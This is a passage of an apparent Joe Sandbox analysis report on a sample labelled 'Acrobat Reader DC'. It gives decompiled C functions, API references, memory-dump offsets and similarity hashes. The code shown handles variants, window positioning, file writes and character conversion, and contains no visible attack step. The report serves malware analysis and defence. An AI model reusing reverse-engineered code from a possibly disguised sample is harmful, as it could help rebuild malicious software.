                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                  • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                  • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                  • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 54%
                                  			E00479500(short* __ecx, void* __fp0, char _a4, intOrPtr _a12) {
                                  				char _v28;
                                  				char _v52;
                                  				short* __edi;
                                  				char* __esi;
                                  				signed int _t32;
                                  				void* _t39;
                                  				void* _t46;
                                  				short* _t47;
                                  				void* _t50;
                                  
                                  				_t47 = __ecx;
                                  				__imp__#8(__ecx, _t46, _t50, _t39);
                                  				_t32 = _a12 - 1;
                                  				 *((intOrPtr*)(__ecx + 8)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0xc)) = 0;
                                  				if(_t32 > 0xb) {
                                  					L17:
                                  					E00408F40(_t47,  &_a4);
                                  					return _t47;
                                  				} else {
                                  					switch( *((intOrPtr*)(_t32 * 4 +  &M004796E4))) {
                                  						case 0:
                                  							__eax = 3;
                                  							__ecx =  &_a4;
                                  							 *__edi = __ax;
                                  							__eax = E0040C650( &_a4);
                                  							goto L16;
                                  						case 1:
                                  							__eax =  &_a4;
                                  							__edx = 0x14;
                                  							 *__edi = __dx;
                                  							__eax = E00443006( &_a4);
                                  							 *((intOrPtr*)(__edi + 0xc)) = __edx;
                                  							goto L16;
                                  						case 2:
                                  							__ecx = 5;
                                  							 *__edi = __cx;
                                  							__ecx =  &_a4;
                                  							__eax = E0040BAA0( &_a4);
                                  							 *((long long*)(__edi + 8)) = __fp0;
                                  							__esi =  &_a4;
                                  							E00408F40(__edi,  &_a4) = __edi;
                                  							_pop(__edi);
                                  							_pop(__esi);
                                  							_pop(__ebx);
                                  							return __edi;
                                  							goto L18;
                                  						case 3:
                                  							__ecx =  &_a4;
                                  							__eax = 8;
                                  							 *__edi = __ax;
                                  							__eax = E0045340C( &_a4);
                                  							_push(__eax);
                                  							__imp__#2();
                                  							goto L16;
                                  						case 4:
                                  							__esp = __esp - 0x10;
                                  							__edx = 0x200c;
                                  							__eax =  &_a4;
                                  							__ebx = __esp;
                                  							 *__edi = __dx;
                                  							__eax = E0040B960( &_a4, __esp, __ecx, __edi);
                                  							__eax = E00479362(__eflags, __fp0);
                                  							goto L16;
                                  						case 5:
                                  							__eax =  &_a4;
                                  							__eax = E00432508( &_a4);
                                  							__esp = __esp - 0x10;
                                  							__ebx = __esp;
                                  							__eax = E0040B960(__eax, __esp, __ecx, __edi);
                                  							__ecx =  &_v28;
                                  							E00479500( &_v28, __fp0) = E00437063(__edi, __eax);
                                  							__ecx =  &_v52;
                                  							_push( &_v52);
                                  							__imp__#9();
                                  							__esi =  &_a4;
                                  							E00408F40(__edi,  &_a4) = __edi;
                                  							_pop(__edi);
                                  							_pop(__esi);
                                  							_pop(__ebx);
                                  							return __edi;
                                  							goto L18;
                                  						case 6:
                                  							__edx =  &_a4;
                                  							__ecx = 0x13;
                                  							 *__edi = __cx;
                                  							__eax = E0044B3AC( &_a4);
                                  							goto L16;
                                  						case 7:
                                  							__eax = _a4;
                                  							__eflags = __eax;
                                  							if(__eax == 0) {
                                  								goto L17;
                                  							} else {
                                  								_push(__eax);
                                  								_push(__edi);
                                  								__imp__#10();
                                  								__esi =  &_a4;
                                  								E00408F40(__edi,  &_a4) = __edi;
                                  								_pop(__edi);
                                  								_pop(__esi);
                                  								_pop(__ebx);
                                  								return __edi;
                                  							}
                                  							goto L18;
                                  						case 8:
                                  							 *__ecx = 0xb;
                                  							 *((short*)(_t47 + 8)) = E00442F4C( &_a4) & 0x000000ff;
                                  							E00408F40(_t47,  &_a4);
                                  							return _t47;
                                  							goto L18;
                                  						case 9:
                                  							__edx =  &_a4;
                                  							__eax = E0044CECD( &_a4);
                                  							__eflags = __al;
                                  							if(__al == 0) {
                                  								goto L14;
                                  							} else {
                                  								__eax = 0xa;
                                  								__esi =  &_a4;
                                  								 *__edi = __ax;
                                  								 *((intOrPtr*)(__edi + 8)) = 0x80020004;
                                  								E00408F40(__edi,  &_a4) = __edi;
                                  								_pop(__edi);
                                  								_pop(__esi);
                                  								_pop(__ebx);
                                  								return __edi;
                                  							}
                                  							goto L18;
                                  						case 0xa:
                                  							L14:
                                  							__esp = __esp - 0x10;
                                  							__ecx = 0x2011;
                                  							__eax =  &_a4;
                                  							__ebx = __esp;
                                  							 *__edi = __cx;
                                  							__eax = E0040B960( &_a4, __esp, 0x2011, __edi);
                                  							__eax = E00473B76(__eflags);
                                  							goto L16;
                                  						case 0xb:
                                  							__esp = __esp - 0x10;
                                  							__edx = 0x2013;
                                  							__eax =  &_a4;
                                  							__ebx = __esp;
                                  							 *__edi = __dx;
                                  							__eax = E0040B960( &_a4, __esp, __ecx, __edi);
                                  							__eax = E0044CE43(__ecx, __eflags);
                                  							L16:
                                  							 *((intOrPtr*)(__edi + 8)) = __eax;
                                  							goto L17;
                                  					}
                                  				}
                                  				L18:
                                  			}













                                  APIs
                                  • VariantInit.OLEAUT32(?), ref: 0047950F
                                  • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                  • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                  • VariantClear.OLEAUT32(?), ref: 00479650
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Variant$AllocClearCopyInitString
                                  • String ID:
                                  • API String ID: 2808897238-0
                                  • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                  • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                  • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                  • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004499DB(void* __eflags, signed int _a4, signed int _a8, int _a12, int _a16, int _a20) {
                                  				struct tagPOINT _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				int _v24;
                                  				long _v28;
                                  				signed int _t57;
                                  				signed int _t58;
                                  				struct HWND__* _t59;
                                  				int _t61;
                                  				int _t64;
                                  				intOrPtr _t69;
                                  				struct HWND__*** _t70;
                                  				struct HWND__** _t71;
                                  				struct HWND__** _t75;
                                  				int _t78;
                                  				int _t79;
                                  				intOrPtr _t83;
                                  				intOrPtr _t84;
                                  				struct tagRECT* _t85;
                                  				signed int _t86;
                                  				int _t87;
                                  				signed int _t88;
                                  				struct HWND__** _t91;
                                  				long _t95;
                                  				struct HWND__** _t104;
                                  				struct HWND__** _t107;
                                  
                                  				_t78 = _a8;
                                  				if(E00441AF5(0x4a8630, _a4,  &_a8,  &_a4) != 0) {
                                  					_t83 =  *0x4a8690; // 0x0
                                  					_t57 = _a4;
                                  					_t84 =  *0x4a86a4; // 0xa71980
                                  					_t107 =  *( *(_t83 + _a8 * 4));
                                  					_t58 = _t57 | 0xffffffff;
                                  					_t104 =  *( *(_t84 + _t57 * 4));
                                  					__eflags = _t78 - _t58;
                                  					if(_t78 != _t58) {
                                  						L6:
                                  						_t59 =  *_t104;
                                  						_t85 =  &_v28;
                                  						_a8 = _t59;
                                  						GetWindowRect(_t59, _t85);
                                  						_t95 = _v28;
                                  						_t86 = _t85 | 0xffffffff;
                                  						__eflags = _a16 - _t86;
                                  						if(_a16 == _t86) {
                                  							_t75 = _v20 - _t95;
                                  							__eflags = _t75;
                                  							_a16 = _t75;
                                  						}
                                  						_t61 = _v24;
                                  						__eflags = _a20 - _t86;
                                  						if(_a20 == _t86) {
                                  							_t91 = _v16 - _t61;
                                  							__eflags = _t91;
                                  							_a20 = _t91;
                                  						}
                                  						_v12.x = _t95;
                                  						_v12.y = _t61;
                                  						ScreenToClient( *_t107,  &_v12);
                                  						__eflags = _t78 - 0xffffffff;
                                  						if(_t78 == 0xffffffff) {
                                  							_t78 = _v12.x;
                                  						}
                                  						_t64 = _a12;
                                  						__eflags = _t64 - 0xffffffff;
                                  						if(_t64 == 0xffffffff) {
                                  							_t64 = _v12.y;
                                  						}
                                  						_t87 = _a16;
                                  						_t107[0x16] = _t78;
                                  						_t107[0x17] = _t64;
                                  						_t107[0x18] = _t87;
                                  						_t107[0x19] = _a20;
                                  						__eflags = _t104[0x20] - _t78;
                                  						if(_t104[0x20] != _t78) {
                                  							L19:
                                  							_t79 = _a8;
                                  							MoveWindow(_t79, _t78, _t64, _t87, _a20, 1);
                                  							E0043028B(_t107, _t104, 1);
                                  							_t88 = 3;
                                  							__eflags = _t104[0x22] - 3;
                                  							if(_t104[0x22] == 3) {
                                  								_a20 = 3;
                                  								__eflags =  *0x4a86b4 - _t88; // 0x2
                                  								if(__eflags >= 0) {
                                  									do {
                                  										_t69 =  *0x4a86a4; // 0xa71980
                                  										_t70 =  *(_t69 + _t88 * 4);
                                  										__eflags =  *_t70;
                                  										if( *_t70 != 0) {
                                  											_t71 =  *_t70;
                                  											__eflags = _t71[1] - _t107[1];
                                  											if(_t71[1] == _t107[1]) {
                                  												__eflags = _t71[0x22] - 0x16;
                                  												if(_t71[0x22] == 0x16) {
                                  													__eflags = _t71[0xc] - _t79;
                                  													if(_t71[0xc] == _t79) {
                                  														SendMessageW( *_t71, 0x469, _t79, 0);
                                  														_t88 = _a20;
                                  													}
                                  												}
                                  											}
                                  										}
                                  										_t88 = _t88 + 1;
                                  										_a20 = _t88;
                                  										__eflags = _t88 -  *0x4a86b4; // 0x2
                                  									} while (__eflags <= 0);
                                  								}
                                  							}
                                  							E00430B87(_t107, _t104, 1);
                                  						} else {
                                  							__eflags = _t104[0x20] - _t64;
                                  							if(_t104[0x20] != _t64) {
                                  								goto L19;
                                  							} else {
                                  								__eflags = _t104[0x21] - _t87;
                                  								if(_t104[0x21] != _t87) {
                                  									goto L19;
                                  								} else {
                                  									__eflags = _t104[0x21] - _a20;
                                  									if(_t104[0x21] != _a20) {
                                  										_t87 = _a16;
                                  										goto L19;
                                  									}
                                  								}
                                  							}
                                  						}
                                  					} else {
                                  						__eflags = _a12 - _t58;
                                  						if(_a12 != _t58) {
                                  							goto L6;
                                  						} else {
                                  							__eflags = _a16 - _t58;
                                  							if(_a16 != _t58) {
                                  								goto L6;
                                  							} else {
                                  								__eflags = _a20 - _t58;
                                  								if(_a20 != _t58) {
                                  									goto L6;
                                  								}
                                  							}
                                  						}
                                  					}
                                  					return 1;
                                  				} else {
                                  					return 0;
                                  				}
                                  			}






























                                  APIs
                                  • GetWindowRect.USER32 ref: 00449A4A
                                  • ScreenToClient.USER32 ref: 00449A80
                                  • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Window$ClientMoveRectScreen
                                  • String ID:
                                  • API String ID: 3880355969-0
                                  • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                  • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                  • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                  • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 96%
                                  			E0041415F(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                  				signed int _v8;
                                  				signed int _v12;
                                  				signed int _v16;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				signed int _t56;
                                  				signed int _t60;
                                  				void* _t65;
                                  				signed int _t66;
                                  				signed int _t69;
                                  				signed int _t71;
                                  				signed int _t72;
                                  				signed int _t74;
                                  				signed int _t75;
                                  				signed int _t78;
                                  				signed int _t79;
                                  				signed int _t81;
                                  				signed int _t85;
                                  				signed int _t92;
                                  				signed int _t93;
                                  				signed int _t94;
                                  				signed int _t95;
                                  				intOrPtr* _t96;
                                  				void* _t97;
                                  
                                  				_t92 = _a8;
                                  				if(_t92 == 0 || _a12 == 0) {
                                  					L4:
                                  					return 0;
                                  				} else {
                                  					_t96 = _a16;
                                  					_t100 = _t96;
                                  					if(_t96 != 0) {
                                  						_t79 = _a4;
                                  						__eflags = _t79;
                                  						if(__eflags == 0) {
                                  							goto L3;
                                  						}
                                  						_t60 = _t56 | 0xffffffff;
                                  						_t88 = _t60 % _t92;
                                  						__eflags = _a12 - _t60 / _t92;
                                  						if(__eflags > 0) {
                                  							goto L3;
                                  						}
                                  						_t93 = _t92 * _a12;
                                  						__eflags =  *(_t96 + 0xc) & 0x0000010c;
                                  						_v8 = _t79;
                                  						_v16 = _t93;
                                  						_t78 = _t93;
                                  						if(( *(_t96 + 0xc) & 0x0000010c) == 0) {
                                  							_v12 = 0x1000;
                                  						} else {
                                  							_v12 =  *(_t96 + 0x18);
                                  						}
                                  						__eflags = _t93;
                                  						if(_t93 == 0) {
                                  							L32:
                                  							return _a12;
                                  						} else {
                                  							do {
                                  								_t81 =  *(_t96 + 0xc) & 0x00000108;
                                  								__eflags = _t81;
                                  								if(_t81 == 0) {
                                  									L18:
                                  									__eflags = _t78 - _v12;
                                  									if(_t78 < _v12) {
                                  										_t65 = E00418F98(_t88, _t93,  *_v8, _t96);
                                  										__eflags = _t65 - 0xffffffff;
                                  										if(_t65 == 0xffffffff) {
                                  											L34:
                                  											_t66 = _t93;
                                  											L35:
                                  											return (_t66 - _t78) / _a8;
                                  										}
                                  										_v8 = _v8 + 1;
                                  										_t69 =  *(_t96 + 0x18);
                                  										_t78 = _t78 - 1;
                                  										_v12 = _t69;
                                  										__eflags = _t69;
                                  										if(_t69 <= 0) {
                                  											_v12 = 1;
                                  										}
                                  										goto L31;
                                  									}
                                  									__eflags = _t81;
                                  									if(_t81 == 0) {
                                  										L21:
                                  										__eflags = _v12;
                                  										_t94 = _t78;
                                  										if(_v12 != 0) {
                                  											_t72 = _t78;
                                  											_t88 = _t72 % _v12;
                                  											_t94 = _t94 - _t72 % _v12;
                                  											__eflags = _t94;
                                  										}
                                  										_push(_t94);
                                  										_push(_v8);
                                  										_push(E00414139(_t96));
                                  										_t71 = E0041B7B2(_t78, _t88, _t94, _t96, __eflags);
                                  										_t97 = _t97 + 0xc;
                                  										__eflags = _t71 - 0xffffffff;
                                  										if(_t71 == 0xffffffff) {
                                  											L36:
                                  											 *(_t96 + 0xc) =  *(_t96 + 0xc) | 0x00000020;
                                  											_t66 = _v16;
                                  											goto L35;
                                  										} else {
                                  											_t85 = _t94;
                                  											__eflags = _t71 - _t94;
                                  											if(_t71 <= _t94) {
                                  												_t85 = _t71;
                                  											}
                                  											_v8 = _v8 + _t85;
                                  											_t78 = _t78 - _t85;
                                  											__eflags = _t71 - _t94;
                                  											if(_t71 < _t94) {
                                  												goto L36;
                                  											} else {
                                  												L27:
                                  												_t93 = _v16;
                                  												goto L31;
                                  											}
                                  										}
                                  									}
                                  									_t74 = E0041443C(_t88, _t96);
                                  									__eflags = _t74;
                                  									if(_t74 != 0) {
                                  										goto L34;
                                  									}
                                  									goto L21;
                                  								}
                                  								_t75 =  *(_t96 + 4);
                                  								__eflags = _t75;
                                  								if(__eflags == 0) {
                                  									goto L18;
                                  								}
                                  								if(__eflags < 0) {
                                  									_t45 = _t96 + 0xc;
                                  									 *_t45 =  *(_t96 + 0xc) | 0x00000020;
                                  									__eflags =  *_t45;
                                  									goto L34;
                                  								}
                                  								_t95 = _t78;
                                  								__eflags = _t78 - _t75;
                                  								if(_t78 >= _t75) {
                                  									_t95 = _t75;
                                  								}
                                  								E00410E60( *_t96, _v8, _t95);
                                  								 *(_t96 + 4) =  *(_t96 + 4) - _t95;
                                  								 *_t96 =  *_t96 + _t95;
                                  								_t97 = _t97 + 0xc;
                                  								_t78 = _t78 - _t95;
                                  								_v8 = _v8 + _t95;
                                  								goto L27;
                                  								L31:
                                  								__eflags = _t78;
                                  							} while (_t78 != 0);
                                  							goto L32;
                                  						}
                                  					}
                                  					L3:
                                  					 *((intOrPtr*)(E00417F77(_t100))) = 0x16;
                                  					E00417F25();
                                  					goto L4;
                                  				}
                                  			}


                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                  • String ID:
                                  • API String ID: 2782032738-0
                                  • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                  • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                  • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                  • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 98%
                                  			E00441672(signed int __eax, signed int* _a4, struct tagPOINT _a8, intOrPtr _a12) {
                                  				signed int _v12;
                                  				signed int _v16;
                                  				intOrPtr _v20;
                                  				struct tagRECT _v36;
                                  				signed int _t38;
                                  				intOrPtr _t40;
                                  				signed int _t44;
                                  				intOrPtr _t45;
                                  				struct HWND__*** _t46;
                                  				struct HWND__** _t47;
                                  				intOrPtr* _t52;
                                  				intOrPtr _t54;
                                  				intOrPtr _t57;
                                  				signed int _t58;
                                  				signed char _t60;
                                  				intOrPtr _t62;
                                  				intOrPtr _t68;
                                  				signed int _t76;
                                  				signed int _t80;
                                  				void* _t86;
                                  				void* _t96;
                                  
                                  				_t38 = __eax | 0xffffffff;
                                  				_v12 = _t38;
                                  				_v16 = _t38;
                                  				_t40 =  *0x4a8690; // 0x0
                                  				ClientToScreen( *( *( *(_t40 +  *_a4 * 4))),  &_a8);
                                  				_t54 =  *0x4a8694; // 0x0
                                  				_t80 = 0;
                                  				if(_t54 <= 0) {
                                  					L24:
                                  					_t44 = MessageBeep(0) | 0xffffffff;
                                  					goto L25;
                                  				} else {
                                  					do {
                                  						_t57 =  *0x4a8690; // 0x0
                                  						_t68 =  *((intOrPtr*)( *((intOrPtr*)(_t57 + _t80 * 4))));
                                  						_v20 = _t68;
                                  						if(_t68 == 0) {
                                  							goto L17;
                                  						} else {
                                  							_t76 = 3;
                                  							_t86 =  *0x4a86b4 - _t76; // 0x2
                                  							if(_t86 < 0) {
                                  								goto L17;
                                  							} else {
                                  								while(1) {
                                  									_t45 =  *0x4a86a4; // 0xa71980
                                  									_t46 =  *(_t45 + _t76 * 4);
                                  									if( *_t46 == 0) {
                                  										goto L16;
                                  									}
                                  									L6:
                                  									_t47 =  *_t46;
                                  									if(_t47[1] !=  *((intOrPtr*)(_t68 + 4)) || (_t47[0x22] & 0x00000020) != 0) {
                                  										goto L16;
                                  									} else {
                                  										_t60 = _t47[0x22];
                                  										if(_t60 == 0xff || (_t60 & 0x000000ff) ==  *((intOrPtr*)(_t68 + 0x194))) {
                                  											GetWindowRect( *_t47,  &_v36);
                                  											_push(_a12);
                                  											if(PtInRect( &_v36, _a8) == 0) {
                                  												goto L16;
                                  											} else {
                                  												_t52 = _a4;
                                  												if( *_t52 != _t80) {
                                  													_v16 = _t80;
                                  												}
                                  												_t62 =  *0x4a86a4; // 0xa71980
                                  												if(( *( *((intOrPtr*)( *((intOrPtr*)(_t62 + _t76 * 4)))) + 0x8a) & 0x00000008) != 0) {
                                  													if( *_t52 != _t80) {
                                  														 *_t52 = _v16;
                                  													}
                                  													return _t76;
                                  												} else {
                                  													if(_v12 < 0) {
                                  														_v12 = _t76;
                                  													}
                                  													goto L16;
                                  												}
                                  											}
                                  										} else {
                                  											goto L16;
                                  										}
                                  									}
                                  									goto L26;
                                  									L16:
                                  									_t76 = _t76 + 1;
                                  									_t96 = _t76 -  *0x4a86b4; // 0x2
                                  									if(_t96 <= 0) {
                                  										_t68 = _v20;
                                  										_t45 =  *0x4a86a4; // 0xa71980
                                  										_t46 =  *(_t45 + _t76 * 4);
                                  										if( *_t46 == 0) {
                                  											goto L16;
                                  										}
                                  									} else {
                                  										goto L17;
                                  									}
                                  									goto L26;
                                  								}
                                  							}
                                  						}
                                  						goto L26;
                                  						L17:
                                  						_t80 = _t80 + 1;
                                  					} while (_t80 < _t54);
                                  					_t44 = _v12;
                                  					if(_t44 < 0) {
                                  						goto L24;
                                  					} else {
                                  						_t58 = _v16;
                                  						if(_t58 < 0) {
                                  							L25:
                                  							return _t44;
                                  						} else {
                                  							 *_a4 = _t58;
                                  							return _t44;
                                  						}
                                  					}
                                  				}
                                  				L26:
                                  			}


                                  APIs
                                  • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                  • GetWindowRect.USER32 ref: 00441722
                                  • PtInRect.USER32(?,?,?), ref: 00441734
                                  • MessageBeep.USER32(00000000), ref: 004417AD
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Rect$BeepClientMessageScreenWindow
                                  • String ID:
                                  • API String ID: 1352109105-0
                                  • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                  • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                  • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                  • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0042083F(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                  				char _v8;
                                  				signed int _v12;
                                  				char _v20;
                                  				char _t43;
                                  				char _t46;
                                  				signed int _t53;
                                  				signed int _t54;
                                  				intOrPtr _t56;
                                  				intOrPtr _t57;
                                  				int _t58;
                                  				char _t59;
                                  				short* _t60;
                                  				int _t65;
                                  				char* _t73;
                                  
                                  				_t73 = _a8;
                                  				if(_t73 == 0 || _a12 == 0) {
                                  					L5:
                                  					return 0;
                                  				} else {
                                  					if( *_t73 != 0) {
                                  						E00411321( &_v20, __edi, _a16);
                                  						_t43 = _v20;
                                  						__eflags =  *(_t43 + 0x14);
                                  						if( *(_t43 + 0x14) != 0) {
                                  							_t46 = E004131B1( *_t73 & 0x000000ff,  &_v20);
                                  							__eflags = _t46;
                                  							if(_t46 == 0) {
                                  								__eflags = _a4;
                                  								_t40 = _v20 + 4; // 0xbbdae900
                                  								__eflags = MultiByteToWideChar( *_t40, 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
                                  								if(__eflags != 0) {
                                  									L10:
                                  									__eflags = _v8;
                                  									if(_v8 != 0) {
                                  										_t53 = _v12;
                                  										_t11 = _t53 + 0x70;
                                  										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                  										__eflags =  *_t11;
                                  									}
                                  									return 1;
                                  								}
                                  								L21:
                                  								_t54 = E00417F77(__eflags);
                                  								 *_t54 = 0x2a;
                                  								__eflags = _v8;
                                  								if(_v8 != 0) {
                                  									_t54 = _v12;
                                  									_t33 = _t54 + 0x70;
                                  									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                  									__eflags =  *_t33;
                                  								}
                                  								return _t54 | 0xffffffff;
                                  							}
                                  							_t56 = _v20;
                                  							_t15 = _t56 + 0xac; // 0x1ac
                                  							_t65 =  *_t15;
                                  							__eflags = _t65 - 1;
                                  							if(_t65 <= 1) {
                                  								L17:
                                  								_t24 = _t56 + 0xac; // 0x1ac
                                  								__eflags = _a12 -  *_t24;
                                  								if(__eflags < 0) {
                                  									goto L21;
                                  								}
                                  								__eflags = _t73[1];
                                  								if(__eflags == 0) {
                                  									goto L21;
                                  								}
                                  								L19:
                                  								_t26 = _t56 + 0xac; // 0x1ac
                                  								_t57 =  *_t26;
                                  								__eflags = _v8;
                                  								if(_v8 == 0) {
                                  									return _t57;
                                  								}
                                  								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                  								return _t57;
                                  							}
                                  							__eflags = _a12 - _t65;
                                  							if(_a12 < _t65) {
                                  								goto L17;
                                  							}
                                  							__eflags = _a4;
                                  							_t21 = _t56 + 4; // 0xbbdae900
                                  							_t58 = MultiByteToWideChar( *_t21, 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
                                  							__eflags = _t58;
                                  							_t56 = _v20;
                                  							if(_t58 != 0) {
                                  								goto L19;
                                  							}
                                  							goto L17;
                                  						}
                                  						_t59 = _a4;
                                  						__eflags = _t59;
                                  						if(_t59 != 0) {
                                  							 *_t59 =  *_t73 & 0x000000ff;
                                  						}
                                  						goto L10;
                                  					} else {
                                  						_t60 = _a4;
                                  						if(_t60 != 0) {
                                  							 *_t60 = 0;
                                  						}
                                  						goto L5;
                                  					}
